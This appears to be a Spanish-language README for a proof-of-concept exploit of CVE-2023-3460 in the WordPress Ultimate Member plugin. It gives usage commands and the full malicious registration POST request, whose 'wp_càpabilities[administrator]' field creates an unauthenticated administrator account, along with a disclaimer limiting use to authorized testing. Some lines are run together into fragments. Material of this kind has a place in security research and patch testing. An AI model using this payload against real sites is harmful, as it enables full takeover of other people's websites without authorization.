
Este es un exploit de prueba de concepto (PoC) para CVE-2023-3460, una vulnerabilidad crítica en el plugin de WordPress Ultimate Member. Permite a usuarios no autenticados escalar sus privilegios a Administrador mediante una solicitud de registro maliciosa.
🔥 Impacto: Compromiso total del sitio mediante la creación no autorizada de cuentas de administrador.
requestsurllib3beautifulsoup4Instala los requisitos:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) de la página de registrowp_capabilities con el rol administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
Este script se proporciona solo con fines educativos y de pruebas autorizadas. La explotación no autorizada de sistemas es ilegal y poco ética. Úsalo únicamente en sistemas que poseas o para los que tengas permiso de prueba.